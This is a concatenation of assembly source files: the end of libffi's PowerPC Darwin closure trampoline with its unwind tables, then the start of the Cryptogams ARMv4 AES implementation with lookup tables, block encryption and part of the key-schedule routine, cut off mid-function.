   Spills the incoming argument GPRs/FPRs into a fixed 176-byte frame,
   calls ffi_closure_helper_DARWIN to run the user callback, then
   dispatches on the returned FFI type code through a table of
   16-byte code fragments to load the return value into the proper
   registers.
   ------------------------------------------------------------------ */
_ffi_closure_ASM:
LFB1:
mflr r0 // Save return address
stg r0,SF_RETURN(r1)
LCFI0:
/* 24/48 bytes (Linkage Area)
32/64 bytes (outgoing parameter area, always reserved)
104 bytes (13*8 from FPR)
16/32 bytes (result)
176/232 total bytes */
/* skip over caller save area and keep stack aligned to 16/32. */
stgu r1,-SF_ROUND(176)(r1)
LCFI1:
/* We want to build up an area for the parameters passed
in registers. (both floating point and integer) */
/* 176/256 bytes (callee stack frame aligned to 16/32)
24/48 bytes (caller linkage area)
200/304 (start of caller parameter area aligned to 4/8)
*/
/* Save GPRs 3 - 10 (aligned to 4/8)
in the parent's outgoing area. */
stg r3,200(r1)
stg r4,204(r1)
stg r5,208(r1)
stg r6,212(r1)
stg r7,216(r1)
stg r8,220(r1)
stg r9,224(r1)
stg r10,228(r1)
/* Save FPRs 1 - 13. (aligned to 8) */
stfd f1,56(r1)
stfd f2,64(r1)
stfd f3,72(r1)
stfd f4,80(r1)
stfd f5,88(r1)
stfd f6,96(r1)
stfd f7,104(r1)
stfd f8,112(r1)
stfd f9,120(r1)
stfd f10,128(r1)
stfd f11,136(r1)
stfd f12,144(r1)
stfd f13,152(r1)
// Set up registers for the routine that actually does the work.
mr r3,r11 // context pointer from the trampoline
addi r4,r1,160 // result storage
addi r5,r1,200 // saved GPRs
addi r6,r1,56 // saved FPRs
bl Lffi_closure_helper_DARWIN$stub
/* Now r3 contains the return type. Use it to look up in a table
so we know how to deal with each type. */
addi r5,r1,160 // Copy result storage pointer.
bl Lget_ret_type0_addr // Get pointer to Lret_type0 into LR.
mflr r4 // Move to r4.
slwi r3,r3,4 // Multiply return type by 16.
add r3,r3,r4 // Add contents of table to table address.
mtctr r3
bctr
LFE1:
/* Each of the ret_typeX code fragments has to be exactly 16 bytes long
(4 instructions). For cache effectiveness we align to a 16 byte boundary
first. */
.align 4
nop
nop
nop
Lget_ret_type0_addr:
blrl
/* case FFI_TYPE_VOID */
Lret_type0:
b Lfinish
nop
nop
nop
/* case FFI_TYPE_INT */
Lret_type1:
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_FLOAT */
Lret_type2:
lfs f1,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_DOUBLE */
Lret_type3:
lfd f1,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_LONGDOUBLE */
Lret_type4:
lfd f1,0(r5)
lfd f2,8(r5)
b Lfinish
nop
/* case FFI_TYPE_UINT8 */
Lret_type5:
lbz r3,3(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT8 */
Lret_type6:
lbz r3,3(r5)
extsb r3,r3
b Lfinish
nop
/* case FFI_TYPE_UINT16 */
Lret_type7:
lhz r3,2(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT16 */
Lret_type8:
lha r3,2(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_UINT32 */
Lret_type9: // same as Lret_type1
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_SINT32 */
Lret_type10: // same as Lret_type1
lwz r3,0(r5)
b Lfinish
nop
nop
/* case FFI_TYPE_UINT64 */
Lret_type11:
lwz r3,0(r5)
lwz r4,4(r5)
b Lfinish
nop
/* case FFI_TYPE_SINT64 */
Lret_type12: // same as Lret_type11
lwz r3,0(r5)
lwz r4,4(r5)
b Lfinish
nop
/* case FFI_TYPE_STRUCT */
Lret_type13:
b Lfinish
nop
nop
nop
/* End 16-byte aligned cases */
/* case FFI_TYPE_POINTER */
// This case assumes that FFI_TYPE_POINTER == FFI_TYPE_LAST. If more types
// are added in future, the following code will need to be updated and
// padded to 16 bytes.
Lret_type14:
lg r3,0(r5)
// fall through
/* case done */
Lfinish:
addi r1,r1,SF_ROUND(176) // Restore stack pointer.
lg r0,SF_RETURN(r1) // Restore return address.
mtlr r0 // Restore link register.
blr
/* END(ffi_closure_ASM) */
/* Hand-encoded DWARF CFI (CIE + FDE) for the ppc32 _ffi_closure_ASM.
   NOTE(review): the first DW_CFA_advance_loc4 uses LCFI1-LCFI0 and
   the second uses LCFI0-LFB1 -- reversed relative to the code order
   of those labels -- and L$set$3 is defined twice (L$set$2 is never
   used).  This matches the shipped libffi_osx source, but looks
   suspicious; confirm against upstream before modifying. */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1
.long L$set$0 ; Length of Common Information Entry
LSCIE1:
.long 0x0 ; CIE Identifier Tag
.byte 0x1 ; CIE Version
.ascii "zR\0" ; CIE Augmentation
.byte 0x1 ; uleb128 0x1; CIE Code Alignment Factor
.byte 0x7c ; sleb128 -4; CIE Data Alignment Factor
.byte 0x41 ; CIE RA Column
.byte 0x1 ; uleb128 0x1; Augmentation size
.byte 0x10 ; FDE Encoding (pcrel)
.byte 0xc ; DW_CFA_def_cfa
.byte 0x1 ; uleb128 0x1
.byte 0x0 ; uleb128 0x0
.align LOG2_GPR_BYTES
LECIE1:
.globl _ffi_closure_ASM.eh
_ffi_closure_ASM.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1
.long L$set$1 ; FDE Length
LASFDE1:
.long LASFDE1-EH_frame1 ; FDE CIE offset
.g_long LFB1-. ; FDE initial location
.set L$set$3,LFE1-LFB1
.g_long L$set$3 ; FDE address range
.byte 0x0 ; uleb128 0x0; Augmentation size
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$3,LCFI1-LCFI0
.long L$set$3
.byte 0xe ; DW_CFA_def_cfa_offset
.byte 176,1 ; uleb128 176
.byte 0x4 ; DW_CFA_advance_loc4
.set L$set$4,LCFI0-LFB1
.long L$set$4
.byte 0x11 ; DW_CFA_offset_extended_sf
.byte 0x41 ; uleb128 0x41
.byte 0x7e ; sleb128 -2
.align LOG2_GPR_BYTES
LEFDE1:
.data
.align LOG2_GPR_BYTES
LDFCM0:
/* Lazy PIC stub for ffi_closure_helper_DARWIN: materialize the lazy
   pointer address PC-relatively (bcl/mflr trick), restore LR, and
   jump through the pointer; it initially targets
   dyld_stub_binding_helper so dyld binds the symbol on first use. */
.section __TEXT,__picsymbolstub1,symbol_stubs,pure_instructions,32
.align LOG2_GPR_BYTES
Lffi_closure_helper_DARWIN$stub:
.indirect_symbol _ffi_closure_helper_DARWIN
mflr r0
bcl 20,31,LO$ffi_closure_helper_DARWIN
LO$ffi_closure_helper_DARWIN:
mflr r11
addis r11,r11,ha16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)
mtlr r0
lgu r12,lo16(L_ffi_closure_helper_DARWIN$lazy_ptr - LO$ffi_closure_helper_DARWIN)(r11)
mtctr r12
bctr
.lazy_symbol_pointer
L_ffi_closure_helper_DARWIN$lazy_ptr:
.indirect_symbol _ffi_closure_helper_DARWIN
.g_long dyld_stub_binding_helper
#endif // __ppc__
|
Akhil-Sharma-26/yeet
| 32,114
|
external/cryptopp/aes_armv4.S
|
@ Copyright 2007-2018 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, JUL 2018: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
@ JW, JUL 2018: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__) && !defined(__APPLE__)
.syntax unified
.thumb
#else
.code 32
#undef __thumb2__
#endif
.text
@ AES encryption lookup tables for the Cryptogams ARMv4 code:
@ 256 32-bit words of a combined SubBytes+MixColumns "Te" table
@ (the rotated variants are presumably derived by rotation in the
@ encrypt routine -- confirm against _cryptogams_armv4_AES_encrypt),
@ followed by the plain S-box bytes (Te4) and the key-schedule
@ round constants (rcon).  Constant data: do not modify.
.type AES_Te,%object
.align 5
AES_Te:
.word 0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d
.word 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554
.word 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d
.word 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a
.word 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87
.word 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b
.word 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea
.word 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b
.word 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a
.word 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f
.word 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108
.word 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f
.word 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e
.word 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5
.word 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d
.word 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f
.word 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e
.word 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb
.word 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce
.word 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497
.word 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c
.word 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed
.word 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b
.word 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a
.word 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16
.word 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594
.word 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81
.word 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3
.word 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a
.word 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504
.word 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163
.word 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d
.word 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f
.word 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739
.word 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47
.word 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395
.word 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f
.word 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883
.word 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c
.word 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76
.word 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e
.word 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4
.word 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6
.word 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b
.word 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7
.word 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0
.word 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25
.word 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818
.word 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72
.word 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651
.word 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21
.word 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85
.word 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa
.word 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12
.word 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0
.word 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9
.word 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133
.word 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7
.word 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920
.word 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a
.word 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17
.word 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8
.word 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11
.word 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a
@ Te4[256]
.byte 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
.byte 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
.byte 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
.byte 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
.byte 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
.byte 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
.byte 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
.byte 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
.byte 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
.byte 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
.byte 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
.byte 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
.byte 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
.byte 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
.byte 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
.byte 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
.byte 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
.byte 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
.byte 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
.byte 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
.byte 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
.byte 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
.byte 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
.byte 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
.byte 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
.byte 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
.byte 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
.byte 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
.byte 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
.byte 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
.byte 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
.byte 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
@ rcon[]
.word 0x01000000, 0x02000000, 0x04000000, 0x08000000
.word 0x10000000, 0x20000000, 0x40000000, 0x80000000
.word 0x1B000000, 0x36000000, 0, 0, 0, 0, 0, 0
.size AES_Te,.-AES_Te
@ void cryptogams_AES_encrypt_block(const unsigned char *in, unsigned char *out,
@ const AES_KEY *key) {
@
@ Public entry point: encrypt one 16-byte block with a prepared key schedule.
@ AAPCS in:  r0 = in (16-byte source), r1 = out (16-byte destination),
@            r2 = key (expanded schedule; round count stored at offset 240).
@ r1 ('out') is pushed first by the stmdb below and popped back into r12
@ after the core routine so the result in r0-r3 can be stored to it.
.globl cryptogams_AES_encrypt_block
.type cryptogams_AES_encrypt_block,%function
.align 5
cryptogams_AES_encrypt_block:
#ifndef __thumb2__
sub r3,pc,#8 @ cryptogams_AES_encrypt_block
#else
adr r3,.
#endif
stmdb sp!,{r1,r4-r12,lr} @ save 'out' plus callee-saved registers
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Te
#else
sub r10,r3,#cryptogams_AES_encrypt_block-AES_Te @ Te
#endif
mov r12,r0 @ inp
mov r11,r2
#if __ARM_ARCH__<7
@ Pre-ARMv7: build each 32-bit big-endian state word byte-by-byte, so any
@ input alignment and either endianness is handled without rev/unaligned ldr.
ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
orr r3,r3,r5,lsl#16
orr r3,r3,r6,lsl#24
#else
@ ARMv7+: word loads, byte-swapped on little-endian via rev.
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
#endif
bl _cryptogams_armv4_AES_encrypt_block
ldr r12,[sp],#4 @ pop out
#if __ARM_ARCH__>=7
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r12,#0]
str r1,[r12,#4]
str r2,[r12,#8]
str r3,[r12,#12]
#else
@ Pre-ARMv7 store path: emit the ciphertext one byte at a time, again
@ independent of alignment and endianness.
mov r4,r0,lsr#24 @ write output in endian-neutral
mov r5,r0,lsr#16 @ manner...
mov r6,r0,lsr#8
strb r4,[r12,#0]
strb r5,[r12,#1]
mov r4,r1,lsr#24
strb r6,[r12,#2]
mov r5,r1,lsr#16
strb r0,[r12,#3]
mov r6,r1,lsr#8
strb r4,[r12,#4]
strb r5,[r12,#5]
mov r4,r2,lsr#24
strb r6,[r12,#6]
mov r5,r2,lsr#16
strb r1,[r12,#7]
mov r6,r2,lsr#8
strb r4,[r12,#8]
strb r5,[r12,#9]
mov r4,r3,lsr#24
strb r6,[r12,#10]
mov r5,r3,lsr#16
strb r2,[r12,#11]
mov r6,r3,lsr#8
strb r4,[r12,#12]
strb r5,[r12,#13]
strb r6,[r12,#14]
strb r3,[r12,#15]
#endif
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_encrypt_block,.-cryptogams_AES_encrypt_block
@ Internal AES encryption core.
@ In:   r0-r3 = plaintext state as four big-endian 32-bit words
@       r10   = AES_Te (combined T-table), r11 = key schedule
@ Out:  r0-r3 = ciphertext state words; r11 advanced past the schedule
@ Clob: r4-r9, r12, lr, flags.
@ One 1024-byte word table serves as Te0..Te3: the same lookup is merged
@ into each state word with a different ror amount.
.type _cryptogams_armv4_AES_encrypt_block,%function
.align 2
_cryptogams_armv4_AES_encrypt_block:
str lr,[sp,#-4]! @ push lr
ldmia r11!,{r4,r5,r6,r7} @ round 0: AddRoundKey
eor r0,r0,r4
ldr r12,[r11,#240-16] @ r12 = key->rounds (10/12/14)
eor r1,r1,r5
eor r2,r2,r6
eor r3,r3,r7
sub r12,r12,#1 @ rounds-1 full table rounds; last round is special
mov lr,#255 @ byte-extraction mask
and r7,lr,r0
and r8,lr,r0,lsr#8
and r9,lr,r0,lsr#16
mov r0,r0,lsr#24
.Lenc_loop:
@ One full round per iteration: SubBytes+ShiftRows+MixColumns via four
@ rotated table lookups per state word, then AddRoundKey from [r11].
ldr r4,[r10,r7,lsl#2] @ Te3[s0>>0]
and r7,lr,r1,lsr#16 @ i0
ldr r5,[r10,r8,lsl#2] @ Te2[s0>>8]
and r8,lr,r1
ldr r6,[r10,r9,lsl#2] @ Te1[s0>>16]
and r9,lr,r1,lsr#8
ldr r0,[r10,r0,lsl#2] @ Te0[s0>>24]
mov r1,r1,lsr#24
ldr r7,[r10,r7,lsl#2] @ Te1[s1>>16]
ldr r8,[r10,r8,lsl#2] @ Te3[s1>>0]
ldr r9,[r10,r9,lsl#2] @ Te2[s1>>8]
eor r0,r0,r7,ror#8
ldr r1,[r10,r1,lsl#2] @ Te0[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r5,r8,ror#8
and r8,lr,r2,lsr#16 @ i1
eor r6,r6,r9,ror#8
and r9,lr,r2
ldr r7,[r10,r7,lsl#2] @ Te2[s2>>8]
eor r1,r1,r4,ror#24
ldr r8,[r10,r8,lsl#2] @ Te1[s2>>16]
mov r2,r2,lsr#24
ldr r9,[r10,r9,lsl#2] @ Te3[s2>>0]
eor r0,r0,r7,ror#16
ldr r2,[r10,r2,lsl#2] @ Te0[s2>>24]
and r7,lr,r3 @ i0
eor r1,r1,r8,ror#8
and r8,lr,r3,lsr#8 @ i1
eor r6,r6,r9,ror#16
and r9,lr,r3,lsr#16 @ i2
ldr r7,[r10,r7,lsl#2] @ Te3[s3>>0]
eor r2,r2,r5,ror#16
ldr r8,[r10,r8,lsl#2] @ Te2[s3>>8]
mov r3,r3,lsr#24
ldr r9,[r10,r9,lsl#2] @ Te1[s3>>16]
eor r0,r0,r7,ror#24
ldr r7,[r11],#16 @ next round key words, interleaved with eors
eor r1,r1,r8,ror#16
ldr r3,[r10,r3,lsl#2] @ Te0[s3>>24]
eor r2,r2,r9,ror#8
ldr r4,[r11,#-12]
eor r3,r3,r6,ror#8
ldr r5,[r11,#-8]
eor r0,r0,r7
ldr r6,[r11,#-4]
and r7,lr,r0
eor r1,r1,r4
and r8,lr,r0,lsr#8
eor r2,r2,r5
and r9,lr,r0,lsr#16
eor r3,r3,r6
mov r0,r0,lsr#24
subs r12,r12,#1
bne .Lenc_loop
@ Final round: SubBytes only (no MixColumns). S-box bytes are fetched
@ with ldrb at word stride from r10+2 — byte 2 of each 32-bit Te entry
@ holds the plain S-box value (e.g. Te[0]=0xc66363a5, byte 2 = 0x63).
add r10,r10,#2
ldrb r4,[r10,r7,lsl#2] @ Te4[s0>>0]
and r7,lr,r1,lsr#16 @ i0
ldrb r5,[r10,r8,lsl#2] @ Te4[s0>>8]
and r8,lr,r1
ldrb r6,[r10,r9,lsl#2] @ Te4[s0>>16]
and r9,lr,r1,lsr#8
ldrb r0,[r10,r0,lsl#2] @ Te4[s0>>24]
mov r1,r1,lsr#24
ldrb r7,[r10,r7,lsl#2] @ Te4[s1>>16]
ldrb r8,[r10,r8,lsl#2] @ Te4[s1>>0]
ldrb r9,[r10,r9,lsl#2] @ Te4[s1>>8]
eor r0,r7,r0,lsl#8
ldrb r1,[r10,r1,lsl#2] @ Te4[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r8,r5,lsl#8
and r8,lr,r2,lsr#16 @ i1
eor r6,r9,r6,lsl#8
and r9,lr,r2
ldrb r7,[r10,r7,lsl#2] @ Te4[s2>>8]
eor r1,r4,r1,lsl#24
ldrb r8,[r10,r8,lsl#2] @ Te4[s2>>16]
mov r2,r2,lsr#24
ldrb r9,[r10,r9,lsl#2] @ Te4[s2>>0]
eor r0,r7,r0,lsl#8
ldrb r2,[r10,r2,lsl#2] @ Te4[s2>>24]
and r7,lr,r3 @ i0
eor r1,r1,r8,lsl#16
and r8,lr,r3,lsr#8 @ i1
eor r6,r9,r6,lsl#8
and r9,lr,r3,lsr#16 @ i2
ldrb r7,[r10,r7,lsl#2] @ Te4[s3>>0]
eor r2,r5,r2,lsl#24
ldrb r8,[r10,r8,lsl#2] @ Te4[s3>>8]
mov r3,r3,lsr#24
ldrb r9,[r10,r9,lsl#2] @ Te4[s3>>16]
eor r0,r7,r0,lsl#8
ldr r7,[r11,#0] @ final AddRoundKey
ldrb r3,[r10,r3,lsl#2] @ Te4[s3>>24]
eor r1,r1,r8,lsl#8
ldr r4,[r11,#4]
eor r2,r2,r9,lsl#16
ldr r5,[r11,#8]
eor r3,r6,r3,lsl#24
ldr r6,[r11,#12]
eor r0,r0,r7
eor r1,r1,r4
eor r2,r2,r5
eor r3,r3,r6
sub r10,r10,#2 @ restore table pointer
ldr pc,[sp],#4 @ pop and return
.size _cryptogams_armv4_AES_encrypt_block,.-_cryptogams_armv4_AES_encrypt_block
@ int cryptogams_AES_set_encrypt_key(const unsigned char *userKey, int bits,
@                                    AES_KEY *key)
@ Expands a 128/192/256-bit user key into the encryption key schedule.
@ AAPCS in:  r0 = userKey, r1 = bits (must be 128, 192 or 256), r2 = key.
@ Returns 0 in r0 on success, -1 on NULL pointer or unsupported bit size.
@ The round count (10/12/14) is stored at offset 240 of the AES_KEY.
.globl cryptogams_AES_set_encrypt_key
.type cryptogams_AES_set_encrypt_key,%function
.align 5
cryptogams_AES_set_encrypt_key:
_armv4_AES_set_encrypt_key:
#ifndef __thumb2__
sub r3,pc,#8 @ AES_set_encrypt_key
#else
adr r3,.
#endif
@ Argument sanity checks: NULL userKey or key, or bits not in {128,192,256}
@ return -1 via .Labrt.
teq r0,#0
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
moveq r0,#-1
beq .Labrt
teq r2,#0
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
moveq r0,#-1
beq .Labrt
teq r1,#128
beq .Lok
teq r1,#192
beq .Lok
teq r1,#256
#ifdef __thumb2__
itt ne @ Thumb2 thing, sanity check in ARM
#endif
movne r0,#-1
bne .Labrt
.Lok: stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
mov r12,r0 @ inp
mov lr,r1 @ bits
mov r11,r2 @ key
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Te+1024 @ Te4
#else
sub r10,r3,#_armv4_AES_set_encrypt_key-AES_Te-1024 @ Te4
#endif
@ r10 = Te4 (256-byte S-box table at AES_Te+1024); rcon words follow it.
#if __ARM_ARCH__<7
@ Pre-ARMv7: load the first 16 key bytes endian-neutrally (cf. encrypt path)
@ and store them as rk[0..3].
